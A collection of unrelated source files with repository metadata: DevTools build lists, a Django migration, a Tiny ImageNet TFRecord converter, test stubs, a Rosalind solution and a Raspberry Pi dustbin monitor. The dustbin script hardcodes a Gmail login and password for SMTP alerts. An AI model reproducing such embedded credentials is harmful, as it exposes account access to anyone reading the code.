'front_end/sourcesPanel.css',
'front_end/sourcesView.css',
'front_end/spectrum.css',
'front_end/splitView.css',
'front_end/suggestBox.css',
'front_end/timelinePanel.css',
'front_end/canvasProfiler.css',
'front_end/layersPanel.css',
],
'devtools_console_js_files': [
'front_end/console/ConsolePanel.js',
'front_end/console/ConsoleView.js',
'front_end/console/ConsoleViewMessage.js',
],
'devtools_search_js_files': [
'front_end/search/AdvancedSearchView.js',
'front_end/search/FileBasedSearchResultsPane.js',
'front_end/search/SourcesSearchScope.js',
],
'devtools_devices_js_files': [
'front_end/devices/DevicesView.js',
],
'devtools_settings_js_files': [
'front_end/settings/EditFileSystemDialog.js',
'front_end/settings/SettingsScreen.js',
],
'devtools_elements_js_files': [
'front_end/elements/DOMSyntaxHighlighter.js',
'front_end/elements/ElementsTreeOutline.js',
'front_end/elements/ElementsPanel.js',
'front_end/elements/EventListenersSidebarPane.js',
'front_end/elements/MetricsSidebarPane.js',
'front_end/elements/OverridesView.js',
'front_end/elements/PlatformFontsSidebarPane.js',
'front_end/elements/PropertiesSidebarPane.js',
'front_end/elements/RenderingOptionsView.js',
'front_end/elements/Spectrum.js',
'front_end/elements/StylesSidebarPane.js',
],
'devtools_extensions_js_files': [
'front_end/extensions/ExtensionAuditCategory.js',
'front_end/extensions/ExtensionPanel.js',
'front_end/extensions/ExtensionRegistryStub.js',
'front_end/extensions/ExtensionServer.js',
'front_end/extensions/ExtensionView.js',
'<@(devtools_extension_api_files)',
],
'devtools_resources_js_files': [
'front_end/resources/ApplicationCacheItemsView.js',
'front_end/resources/CookieItemsView.js',
'front_end/resources/DOMStorageItemsView.js',
'front_end/resources/DatabaseQueryView.js',
'front_end/resources/DatabaseTableView.js',
'front_end/resources/DirectoryContentView.js',
'front_end/resources/FileContentView.js',
'front_end/resources/FileSystemView.js',
'front_end/resources/IndexedDBViews.js',
'front_end/resources/ResourcesPanel.js',
],
'devtools_source_frame_js_files': [
'front_end/source_frame/CodeMirrorTextEditor.js',
'front_end/source_frame/CodeMirrorUtils.js',
'front_end/source_frame/FontView.js',
'front_end/source_frame/GoToLineDialog.js',
'front_end/source_frame/ImageView.js',
'front_end/source_frame/ResourceView.js',
'front_end/source_frame/SourceFrame.js',
],
'devtools_network_js_files': [
'front_end/network/HAREntry.js',
'front_end/network/NetworkItemView.js',
'front_end/network/RequestCookiesView.js',
'front_end/network/RequestHeadersView.js',
'front_end/network/RequestHTMLView.js',
'front_end/network/RequestJSONView.js',
'front_end/network/RequestPreviewView.js',
'front_end/network/RequestResponseView.js',
'front_end/network/RequestTimingView.js',
'front_end/network/RequestView.js',
'front_end/network/ResourceWebSocketFrameView.js',
'front_end/network/NetworkPanel.js',
],
'devtools_sources_js_files': [
'front_end/sources/BreakpointsSidebarPane.js',
'front_end/sources/CSSSourceFrame.js',
'front_end/sources/CallStackSidebarPane.js',
'front_end/sources/EditingLocationHistoryManager.js',
'front_end/sources/FilePathScoreFunction.js',
'front_end/sources/FilteredItemSelectionDialog.js',
'front_end/sources/InplaceFormatterEditorAction.js',
'front_end/sources/JavaScriptSourceFrame.js',
'front_end/sources/NavigatorView.js',
'front_end/sources/Placard.js',
'front_end/sources/RevisionHistoryView.js',
'front_end/sources/ScopeChainSidebarPane.js',
'front_end/sources/ScriptFormatter.js',
'front_end/sources/ScriptFormatterEditorAction.js',
'front_end/sources/SimpleHistoryManager.js',
'front_end/sources/SourcesNavigator.js',
'front_end/sources/SourcesPanel.js',
'front_end/sources/SourcesView.js',
'front_end/sources/StyleSheetOutlineDialog.js',
'front_end/sources/TabbedEditorContainer.js',
'front_end/sources/UISourceCodeFrame.js',
'front_end/sources/WatchExpressionsSidebarPane.js',
'front_end/sources/WorkersSidebarPane.js',
'front_end/sources/TargetsToolbar.js',
],
'devtools_timeline_js_files': [
'front_end/timeline/CountersGraph.js',
'front_end/timeline/Layers3DView.js',
'front_end/timeline/MemoryCountersGraph.js',
'front_end/timeline/TimelineFrameModel.js',
'front_end/timeline/TimelineJSProfile.js',
'front_end/timeline/TimelineModel.js',
'front_end/timeline/TimelineModelImpl.js',
'front_end/timeline/TimelinePresentationModel.js',
'front_end/timeline/TimelineOverviewPane.js',
'front_end/timeline/TimelineEventOverview.js',
'front_end/timeline/TimelineFlameChart.js',
'front_end/timeline/TimelineFrameOverview.js',
'front_end/timeline/TimelineMemoryOverview.js',
'front_end/timeline/TimelineUIUtils.js',
'front_end/timeline/TimelineUIUtilsImpl.js',
'front_end/timeline/TimelineView.js',
'front_end/timeline/TimelinePowerGraph.js',
'front_end/timeline/TimelinePowerOverview.js',
'front_end/timeline/TimelinePanel.js',
'front_end/timeline/TimelineTracingView.js',
'front_end/timeline/TimelineLayersView.js',
'front_end/timeline/TracingModel.js',
'front_end/timeline/TracingTimelineModel.js',
'front_end/timeline/TracingTimelineUIUtils.js',
'front_end/timeline/TransformController.js'
],
'devtools_profiler_js_files': [
'front_end/profiler/CPUProfileBottomUpDataGrid.js',
'front_end/profiler/CPUProfileDataGrid.js',
'front_end/profiler/CPUProfileFlameChart.js',
'front_end/profiler/CPUProfileTopDownDataGrid.js',
'front_end/profiler/CPUProfileView.js',
'front_end/profiler/HeapSnapshotCommon.js',
'front_end/profiler/HeapSnapshotDataGrids.js',
'front_end/profiler/HeapSnapshotGridNodes.js',
'front_end/profiler/HeapSnapshotProxy.js',
'front_end/profiler/HeapSnapshotView.js',
'front_end/profiler/ProfilesPanel.js',
'front_end/profiler/ProfileLauncherView.js',
'front_end/profiler/CanvasProfileView.js',
'front_end/profiler/CanvasReplayStateView.js',
],
'devtools_heap_snapshot_worker_js_files': [
'front_end/ui/TextUtils.js',
'front_end/common/UIString.js',
'front_end/common/utilities.js',
'front_end/profiler/HeapSnapshotCommon.js',
'front_end/profiler/heap_snapshot_worker/AllocationProfile.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshot.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotLoader.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotWorker.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotWorkerDispatcher.js',
'front_end/profiler/heap_snapshot_worker/JSHeapSnapshot.js',
],
'devtools_audits_js_files': [
'front_end/audits/AuditCategories.js',
'front_end/audits/AuditCategory.js',
'front_end/audits/AuditController.js',
'front_end/audits/AuditFormatters.js',
'front_end/audits/AuditLauncherView.js',
'front_end/audits/AuditResultView.js',
'front_end/audits/AuditRules.js',
'front_end/audits/AuditsPanel.js',
],
'devtools_cm_css_files': [
'front_end/cm/cmdevtools.css',
'front_end/cm/codemirror.css',
],
'devtools_cm_js_files': [
'front_end/cm/clike.js',
'front_end/cm/closebrackets.js',
'front_end/cm/codemirror.js',
'front_end/cm/coffeescript.js',
'front_end/cm/comment.js',
'front_end/cm/css.js',
'front_end/cm/headlesscodemirror.js',
'front_end/cm/htmlembedded.js',
'front_end/cm/htmlmixed.js',
'front_end/cm/javascript.js',
'front_end/cm/markselection.js',
'front_end/cm/matchbrackets.js',
'front_end/cm/overlay.js',
'front_end/cm/php.js',
'front_end/cm/python.js',
'front_end/cm/shell.js',
'front_end/cm/xml.js',
],
'devtools_modules_js_files': [
'<@(devtools_console_js_files)',
'<@(devtools_search_js_files)',
'<@(devtools_devices_js_files)',
'<@(devtools_elements_js_files)',
'<@(devtools_extensions_js_files)',
'<@(devtools_resources_js_files)',
'<@(devtools_network_js_files)',
'<@(devtools_source_frame_js_files)',
'<@(devtools_sources_js_files)',
'<@(devtools_timeline_js_files)',
'<@(devtools_profiler_js_files)',
'<@(devtools_audits_js_files)',
'<@(devtools_layers_js_files)',
'<@(devtools_heap_snapshot_worker_js_files)',
'<@(devtools_temp_storage_shared_worker_js_files)',
'<@(devtools_script_formatter_worker_js_files)',
'<@(devtools_uglify_files)',
],
'devtools_uglify_files': [
'front_end/UglifyJS/parse-js.js',
],
'devtools_image_files': [
'front_end/Images/addIcon.png',
'front_end/Images/applicationCache.png',
'front_end/Images/back.png',
'front_end/Images/breakpoint.png',
'front_end/Images/breakpoint_2x.png',
'front_end/Images/breakpointConditional.png',
'front_end/Images/breakpointConditional_2x.png',
'front_end/Images/checker.png',
'front_end/Images/cookie.png',
'front_end/Images/database.png',
'front_end/Images/databaseTable.png',
'front_end/Images/deleteIcon.png',
'front_end/Images/domain.png',
'front_end/Images/forward.png',
'front_end/Images/fileSystem.png',
'front_end/Images/frame.png',
'front_end/Images/graphLabelCalloutLeft.png',
'front_end/Images/graphLabelCalloutRight.png',
'front_end/Images/indexedDB.png',
'front_end/Images/indexedDBObjectStore.png',
'front_end/Images/indexedDBIndex.png',
'front_end/Images/localStorage.png',
'front_end/Images/navigationControls.png',
'front_end/Images/navigationControls_2x.png',
'front_end/Images/paneAddButtons.png',
'front_end/Images/paneElementStateButtons.png',
'front_end/Images/paneFilterButtons.png',
'front_end/Images/paneRefreshButtons.png',
'front_end/Images/paneSettingsButtons.png',
'front_end/Images/popoverArrows.png',
'front_end/Images/popoverBackground.png',
'front_end/Images/profileGroupIcon.png',
'front_end/Images/profileIcon.png',
'front_end/Images/profileSmallIcon.png',
'front_end/Images/radioDot.png',
'front_end/Images/resourceCSSIcon.png',
'front_end/Images/resourceDocumentIcon.png',
'front_end/Images/resourceDocumentIconSmall.png',
'front_end/Images/resourceJSIcon.png',
'front_end/Images/resourcePlainIcon.png',
'front_end/Images/resourcePlainIconSmall.png',
'front_end/Images/resourcesTimeGraphIcon.png',
'front_end/Images/responsiveDesign.png',
'front_end/Images/responsiveDesign_2x.png',
'front_end/Images/searchNext.png',
'front_end/Images/searchPrev.png',
'front_end/Images/sessionStorage.png',
'front_end/Images/settingsListRemove.png',
'front_end/Images/settingsListRemove_2x.png',
'front_end/Images/statusbarButtonGlyphs.png',
'front_end/Images/statusbarButtonGlyphs_2x.png',
'front_end/Images/statusbarResizerHorizontal.png',
'front_end/Images/statusbarResizerVertical.png',
'front_end/Images/thumbActiveHoriz.png',
'front_end/Images/thumbActiveVert.png',
'front_end/Images/thumbHoriz.png',
'front_end/Images/thumbVert.png',
'front_end/Images/thumbHoverHoriz.png',
'front_end/Images/thumbHoverVert.png',
'front_end/Images/toolbarItemSelected.png',
'front_end/Images/trackHoriz.png',
'front_end/Images/trackVert.png',
],
'devtools_layers_js_files': [
'front_end/layers/LayersPanel.js',
'front_end/layers/LayerTreeOutline.js',
'front_end/layers/LayerDetailsView.js',
'front_end/layers/PaintProfilerView.js',
'front_end/layers/LayerPaintProfilerView.js'
],
'devtools_extension_api_files': [
'front_end/extensions/ExtensionAPI.js',
],
'devtools_temp_storage_shared_worker_js_files': [
'front_end/temp_storage_shared_worker/TempStorageSharedWorker.js',
],
'devtools_script_formatter_worker_js_files': [
'front_end/script_formatter_worker/CSSFormatter.js',
'front_end/script_formatter_worker/JavaScriptFormatter.js',
'front_end/script_formatter_worker/ScriptFormatterWorker.js',
'front_end/common/utilities.js',
],
},
}
|
[
"mrobbeloth@pdiarm.com"
] |
mrobbeloth@pdiarm.com
|
849af73f4af5fb0fcdfd30a8278320d74ec2f664
|
ab4f74d127bfc89813ee359bb9c779eca5426ddc
|
/script/label_image.runfiles/org_tensorflow/tensorflow/contrib/slim/python/slim/summaries.py
|
92cbdf8b09354cbddfd0203055d7827b13efb286
|
[
"MIT"
] |
permissive
|
harshit-jain-git/ImageNET
|
cdfd5a340b62862ad8d1cc3b9a0f30cccc481744
|
1cd4c2b70917e4709ce75422c0205fe3735a1b01
|
refs/heads/master
| 2022-12-11T12:47:46.795376
| 2017-12-19T05:47:26
| 2017-12-19T05:47:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
/home/co/Documents/ImageClassifier/tensorflow/tensorflow/contrib/slim/python/slim/summaries.py
|
[
"harshitjain1371999@gmail.com"
] |
harshitjain1371999@gmail.com
|
d4fb859c1c32e4e140058d6eae83a7ca3c90cc99
|
6462a085be913f1164de4beecfef44cfd1b8c280
|
/src/tests/test_handler.py
|
3f04062ef23cd4945d9daad756d0b4822e4b8cfe
|
[] |
no_license
|
perkdrew/softrobot-backend
|
2472dbd7189ace1269a54ea77fcc390546cecf89
|
821574b7c47505a3e54a02526cfa14ca21bfe85b
|
refs/heads/main
| 2023-06-21T17:15:34.701070
| 2021-07-25T23:33:00
| 2021-07-25T23:33:00
| 388,159,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
import pytest, requests
def server(host, port):
pass
|
[
"drew@manivadigital.com"
] |
drew@manivadigital.com
|
aaff714536d0fb5e77c4def099d2dea4223ff9d6
|
b0e6bf9053a820d4f2c8884d89bfe7889910c84d
|
/healthcare/migrations/0028_rx_claim.py
|
0829d75ba8a950ebee86b3270aa46345f2cde827
|
[] |
no_license
|
fzqr7y/RCG-enable-Demo---HealthCare
|
acac76c64072681365cc1282f0bea59713863cfb
|
414f90ffc39c6b515aff2a4937d254ea81736207
|
refs/heads/master
| 2021-01-17T18:56:36.420354
| 2016-10-21T19:27:33
| 2016-10-21T19:27:33
| 71,597,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-12 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('healthcare', '0027_auto_20160909_1703'),
]
operations = [
migrations.CreateModel(
name='Rx_Claim',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True)),
('modified_date', models.DateTimeField(auto_now=True)),
('drug_ndc', models.CharField(max_length=12)),
('drug_name', models.CharField(max_length=20)),
('drug_details', models.CharField(max_length=40)),
('drug_type', models.CharField(max_length=20)),
('therapeutic_class', models.CharField(max_length=20)),
('pharmacy_name', models.CharField(max_length=20)),
('pharmacy_key', models.CharField(max_length=20)),
('city', models.CharField(max_length=20)),
('state', models.CharField(max_length=2)),
('zip', models.CharField(max_length=10)),
('phone', models.CharField(max_length=20)),
('email', models.CharField(max_length=40)),
('prescription_ref', models.CharField(max_length=20)),
('prescribed_date', models.DateTimeField()),
('filled_date', models.DateTimeField()),
('refills_remaining', models.DecimalField(decimal_places=0, max_digits=2)),
('script_quantity', models.DecimalField(decimal_places=2, max_digits=8)),
('script_units', models.CharField(max_length=10)),
('days_supply', models.DecimalField(decimal_places=0, max_digits=4)),
('dose', models.DecimalField(decimal_places=4, max_digits=10)),
('dose_units', models.CharField(max_length=10)),
('take_quantity', models.DecimalField(decimal_places=2, max_digits=8)),
('take_units', models.CharField(max_length=10)),
('take_frequency', models.DecimalField(decimal_places=0, max_digits=2)),
('frequency_units', models.CharField(max_length=10)),
('billed', models.DecimalField(decimal_places=2, max_digits=8)),
('allowed', models.DecimalField(decimal_places=2, max_digits=8)),
('plan_paid', models.DecimalField(decimal_places=2, max_digits=8)),
('member_paid', models.DecimalField(decimal_places=2, max_digits=8)),
('plan_deductible', models.DecimalField(decimal_places=2, max_digits=8)),
('member', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='healthcare.Member')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='healthcare.Provider')),
],
),
]
|
[
"swchesney@gmail.com"
] |
swchesney@gmail.com
|
445d942ea4ffebd2dbe2302f9dd02885998a1ada
|
39d4504ec1da8975fac526d6801b94f4348b6b61
|
/research/adversarial_logit_pairing/tiny_imagenet_converter/converter.py
|
6925cceae9319d3bc9c2b8f585800b65199ee130
|
[
"Apache-2.0"
] |
permissive
|
vincentcheny/models
|
fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
refs/heads/master
| 2020-07-23T21:38:24.559521
| 2019-11-15T07:50:11
| 2019-11-15T07:50:11
| 207,712,649
| 1
| 0
|
Apache-2.0
| 2019-09-11T03:12:31
| 2019-09-11T03:12:31
| null |
UTF-8
|
Python
| false
| false
| 9,410
|
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts Tiny Imagenet dataset into TFRecord format.
As an output this program generates following files in TFRecord format:
- train.tfrecord
- validation.tfrecord
- test.tfrecord
Generated train and validation files will contain tf.Example entries with
following features:
- image/encoded - encoded image
- image/format - image format
- label/wnid - label WordNet ID
- label/imagenet - imagenet label [1 ... 1000]
- label/tiny_imagenet - tiny imagenet label [0 ... 199]
- bbox/xmin
- bbox/ymin
- bbox/xmax
- bbox/ymax
Test file will contain entries with 'image/encoded' and 'image/format' features.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import random
from absl import app
from absl import flags
from absl import logging
import pandas as pd
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_string('input_dir', '', 'Input directory')
flags.DEFINE_string('output_dir', '', 'Output directory')
flags.DEFINE_string('imagenet_synsets_path', '',
'Optional path to /imagenet_lsvrc_2015_synsets.txt')
ImageMetadata = namedtuple('ImageMetadata', ['label', 'x1', 'y1', 'x2', 'y2'])
class WnIdToNodeIdConverter(object):
"""Converts WordNet IDs to numerical labels."""
def __init__(self, wnids_path, background_class):
self._wnid_to_node_id = {}
self._node_id_to_wnid = {}
with tf.gfile.Open(wnids_path) as f:
wnids_sequence = [wnid.strip() for wnid in f.readlines() if wnid.strip()]
node_id_offset = 1 if background_class else 0
for i, label in enumerate(wnids_sequence):
self._wnid_to_node_id[label] = i + node_id_offset
self._node_id_to_wnid[i + node_id_offset] = label
def to_node_id(self, wnid):
return self._wnid_to_node_id[wnid]
def to_wnid(self, node_id):
return self._node_id_to_wnid[node_id]
def all_wnids(self):
return self._wnid_to_node_id.keys()
def read_tiny_imagenet_annotations(annotations_filename,
images_dir,
one_label=None):
"""Reads one file with Tiny Imagenet annotations."""
result = []
if one_label:
column_names = ['filename', 'x1', 'y1', 'x2', 'y2']
else:
column_names = ['filename', 'label', 'x1', 'y1', 'x2', 'y2']
with tf.gfile.Open(annotations_filename) as f:
data = pd.read_csv(f, sep='\t', names=column_names)
for row in data.itertuples():
label = one_label if one_label else getattr(row, 'label')
full_filename = os.path.join(images_dir, getattr(row, 'filename'))
result.append((full_filename,
ImageMetadata(label=label,
x1=getattr(row, 'x1'),
y1=getattr(row, 'y1'),
x2=getattr(row, 'x2'),
y2=getattr(row, 'y2'))))
return result
def read_validation_annotations(validation_dir):
"""Reads validation data annotations."""
return read_tiny_imagenet_annotations(
os.path.join(validation_dir, 'val_annotations.txt'),
os.path.join(validation_dir, 'images'))
def read_training_annotations(training_dir):
"""Reads training data annotations."""
result = []
sub_dirs = tf.gfile.ListDirectory(training_dir)
for sub_dir in sub_dirs:
if not sub_dir.startswith('n'):
logging.warning('Found non-class directory in training dir: %s', sub_dir)
continue
sub_dir_results = read_tiny_imagenet_annotations(
os.path.join(training_dir, sub_dir, sub_dir + '_boxes.txt'),
os.path.join(training_dir, sub_dir, 'images'),
one_label=sub_dir)
result.extend(sub_dir_results)
return result
def read_test_annotations(test_dir):
"""Reads test data annotations."""
files = tf.gfile.ListDirectory(os.path.join(test_dir, 'images'))
return [(os.path.join(test_dir, 'images', f), None)
for f in files if f.endswith('.JPEG')]
def get_image_format(filename):
"""Returns image format from filename."""
filename = filename.lower()
if filename.endswith('jpeg') or filename.endswith('jpg'):
return 'jpeg'
elif filename.endswith('png'):
return 'png'
else:
raise ValueError('Unrecognized file format: %s' % filename)
class TinyImagenetWriter(object):
"""Helper class which writes Tiny Imagenet dataset into TFRecord file."""
def __init__(self, tiny_imagenet_wnid_conveter, imagenet_wnid_converter):
self.tiny_imagenet_wnid_conveter = tiny_imagenet_wnid_conveter
self.imagenet_wnid_converter = imagenet_wnid_converter
def write_tf_record(self,
annotations,
output_file):
"""Generates TFRecord file from given list of annotations."""
with tf.python_io.TFRecordWriter(output_file) as writer:
for image_filename, image_metadata in annotations:
with tf.gfile.Open(image_filename) as f:
image_buffer = f.read()
image_format = get_image_format(image_filename)
features = {
'image/encoded': tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image_buffer])),
'image/format': tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image_format]))
}
if image_metadata:
# bounding box features
features['bbox/xmin'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.x1]))
features['bbox/ymin'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.y1]))
features['bbox/xmax'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.x2]))
features['bbox/ymax'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.y2]))
# tiny imagenet label, from [0, 200) iterval
tiny_imagenet_label = self.tiny_imagenet_wnid_conveter.to_node_id(
image_metadata.label)
features['label/wnid'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=image_metadata.label))
features['label/tiny_imagenet'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[tiny_imagenet_label]))
# full imagenet label, from [1, 1001) interval
if self.imagenet_wnid_converter:
imagenet_label = self.imagenet_wnid_converter.to_node_id(
image_metadata.label)
features['label/imagenet'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[imagenet_label]))
example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(example.SerializeToString())
def main(_):
assert FLAGS.input_dir, 'Input directory must be provided'
assert FLAGS.output_dir, 'Output directory must be provided'
# Create WordNet ID conveters for tiny imagenet and possibly for imagenet
tiny_imagenet_wnid_conveter = WnIdToNodeIdConverter(
os.path.join(FLAGS.input_dir, 'wnids.txt'),
background_class=False)
if FLAGS.imagenet_synsets_path:
imagenet_wnid_converter = WnIdToNodeIdConverter(FLAGS.imagenet_synsets_path,
background_class=True)
else:
imagenet_wnid_converter = None
# read tiny imagenet annotations
train_annotations = read_training_annotations(
os.path.join(FLAGS.input_dir, 'train'))
random.shuffle(train_annotations)
val_annotations = read_validation_annotations(
os.path.join(FLAGS.input_dir, 'val'))
test_filenames = read_test_annotations(os.path.join(FLAGS.input_dir, 'test'))
# Generate TFRecord files
writer = TinyImagenetWriter(tiny_imagenet_wnid_conveter,
imagenet_wnid_converter)
tf.logging.info('Converting %d training images', len(train_annotations))
writer.write_tf_record(train_annotations,
os.path.join(FLAGS.output_dir, 'train.tfrecord'))
tf.logging.info('Converting %d validation images ', len(val_annotations))
writer.write_tf_record(val_annotations,
os.path.join(FLAGS.output_dir, 'validation.tfrecord'))
tf.logging.info('Converting %d test images', len(test_filenames))
writer.write_tf_record(test_filenames,
os.path.join(FLAGS.output_dir, 'test.tfrecord'))
tf.logging.info('All files are converted')
if __name__ == '__main__':
app.run(main)
|
[
"1155107977@link.cuhk.edu.hk"
] |
1155107977@link.cuhk.edu.hk
|
239fdf3de10fa59e880d57dccdeaa8645206165a
|
c3d210e8321afff93ff0b2ea8c304fa4a02a6c04
|
/spk/deluge/src/app/deluge.cgi.py
|
ae747dbdd9559b7c61d37c7bd6bcded603540110
|
[
"BSD-3-Clause"
] |
permissive
|
cytec/spksrc
|
90da6b0542ebca743c6e527626f1f8cfefb040df
|
a955d47d89f080bd9c4362af4ae80da0afbf4e43
|
refs/heads/develop
| 2020-04-05T22:43:22.797226
| 2014-08-19T10:14:10
| 2014-08-19T10:14:10
| 7,053,717
| 4
| 4
| null | 2018-04-19T10:13:09
| 2012-12-07T13:36:45
|
Shell
|
UTF-8
|
Python
| false
| false
| 159
|
py
|
#!/usr/local/deluge/env/bin/python
import os
protocol = 'http'
port = 8112
print 'Location: %s://%s:%d' % (protocol, os.environ['SERVER_NAME'], port)
print
|
[
"diaoulael@gmail.com"
] |
diaoulael@gmail.com
|
15c21aa0fe33a8dd08ee06da88a96d254f592d0b
|
85be01c0a86e72553f24cd6f88bb91c4343a6863
|
/test.py
|
0f209cbe8df41eb48766bfd0664772c2174d338e
|
[
"Apache-2.0"
] |
permissive
|
wurentidai/ELMO
|
8463783def52c77cc74e5385d9bc3523a5c6b54b
|
7df92cc25b0d7e5238ad1821d973a0a56aaa6315
|
refs/heads/master
| 2020-06-01T08:46:29.004700
| 2019-06-06T09:56:42
| 2019-06-06T09:56:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
import numpy as np
char_inputs = np.zeros([2, 1, 3],
np.int32)
res=np.vstack([[1,2,3]]+[[4,5,6]])
# char_inputs[0,0,:]=res[0:1]
# print(res)#[[1, 2, 3], [4, 5, 6]]
# print(res+1)
import tensorflow as tf
with tf.Session() as sess:
z=tf.random_normal((3,4,2),mean=0.0,stddev=1.0,dtype=tf.float32,seed=None,name=None)
f=tf.unstack(z, axis=1)
print(sess.run([z,f]))
|
[
"1187663089@qq.com"
] |
1187663089@qq.com
|
35e13bd1380af1bac9dcf5f5cc0bb2f542369fb9
|
aa5db6a1531d07f56e675e89017cc653d663cb9c
|
/newmail.py
|
d5d83fe5f2371716820ca9733ed8837940675ba5
|
[] |
no_license
|
arundhatighose/SmartDustbin
|
523ff98a2255fdc367ad9fd94d6998aeaf50a2fd
|
55cbf749d8f8f62e0beebe3c4fe5de5166a9e28e
|
refs/heads/master
| 2020-03-24T04:11:42.080593
| 2018-07-26T14:03:34
| 2018-07-26T14:03:34
| 142,440,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,949
|
py
|
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
import smbus
import time
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
TRIG = 23
ECHO = 24
GPIO.setwarnings(False)
print "Distance measurement in progress"
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
fromaddr= "teamshiledinternity@gmail.com"
toaddr= "ghosearundhati96@gmail.com"
msg=MIMEMultipart()
msg['From']=fromaddr
msg['to']=toaddr
msg['subject']='garbage level'
bus = smbus.SMBus(1)
bus.write_byte_data(0x53, 0x2C, 0x0A)
bus.write_byte_data(0x53, 0x2D, 0x08)
bus.write_byte_data(0x53, 0x31, 0x08)
time.sleep(0.5)
data0 = bus.read_byte_data(0x53, 0x32)
data1 = bus.read_byte_data(0x53, 0x33)
xAccl = ((data1 & 0x03) * 256) + data0
if xAccl > 511 :
xAccl -= 1024
data0 = bus.read_byte_data(0x53, 0x34)
data1 = bus.read_byte_data(0x53, 0x35)
yAccl = ((data1 & 0x03) * 256) + data0
if yAccl > 511 :
yAccl -= 1024
data0 = bus.read_byte_data(0x53, 0x36)
data1 = bus.read_byte_data(0x53, 0x37)
zAccl = ((data1 & 0x03) * 256) + data0
if zAccl > 511 :
zAccl -= 1024
GPIO.output(TRIG, False)
GPIO.output(TRIG, True)
GPIO.output(TRIG, False)
while GPIO.input(ECHO)==0:
pulse_start = time.time()
while GPIO.input(ECHO)==1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
distance = int(pulse_duration * 17150)
message = "l=%d" %(distance)
print "distance is : %.1f " %distance
msg.attach(MIMEText(message,'plain'))
server=smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, 'password123@')
text="garbage level exceed"
text1="bin is not placed properly"
if distance < 10:
server.sendmail(fromaddr,toaddr,text)
if (xAccl<0 and zAccl>0 and yAccl>0):
server.sendmail(fromaddr,toaddr,text1)
if (yAccl<0 and zAccl>0 and xAccl>0):
server.sendmail(fromaddr,toaddr,text1)
server.quit
|
[
"ghosearundhati96@gmail.com"
] |
ghosearundhati96@gmail.com
|
2150310528fef0892cc9b51cd2cf02ef51e65e81
|
7051d14616fb3a1f108f72332a116fc784d5b228
|
/Chapter_Rosalind/splc/splc.py
|
7e2089097e9d6b13ca557dcc26f06eb68863854e
|
[] |
no_license
|
demar01/python
|
8544b713c2e41394730f983c85f647ba6d503f55
|
2b020e8f1aef3d542bc94bc76fd9e3112f979133
|
refs/heads/main
| 2023-08-01T21:05:31.012662
| 2021-09-18T07:05:16
| 2021-09-18T07:05:16
| 358,561,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
# -*- coding: utf-8 -*-
"""
http://rosalind.info/problems/splc/
"""
'''
Problem
After identifying the exons and introns of an RNA string, we only need to delete the introns and concatenate the exons to form a new string ready for translation.
Given: A DNA string s (of length at most 1 kbp) and a collection of substrings of s acting as introns. All strings are given in FASTA format.
Return: A protein string resulting from transcribing and translating the exons of s. (Note: Only one solution will exist for the dataset provided.)
Sample Dataset
>Rosalind_10
ATGGTCTACATAGCTGACAAACAGCACGTAGCAATCGGTCGAATCTCGAGAGGCATATGGTCACATGATCGGTCGAGCGTGTTTCAAAGTTTGCGCCTAG
>Rosalind_12
ATCGGTCGAA
>Rosalind_15
ATCGGTCGAGCGTGT
Sample Output
MVYIADKQHVASREAYGHMFKVCA
'''
import sys
sys.path.append("/Users/dermit01/Documents/python/Chapter_Rosalind/")
import rosalind_utils
from Bio.Seq import Seq
from Bio import SeqIO
def splc():
recs = rosalind_utils.read_fasta("Chapter_Rosalind/splc/rosalind_splc.txt")
seqs = [rec[1] for rec in recs]
exon = seqs[0]
introns = sorted(seqs[1:], key=lambda s: len(s), reverse=True)
for intron in introns:
exon = exon.replace(intron, "", 1)
prot = Seq(exon).transcribe().translate()
return prot[:-1]
|
[
"maria.dermit@qmul.ac.uk"
] |
maria.dermit@qmul.ac.uk
|
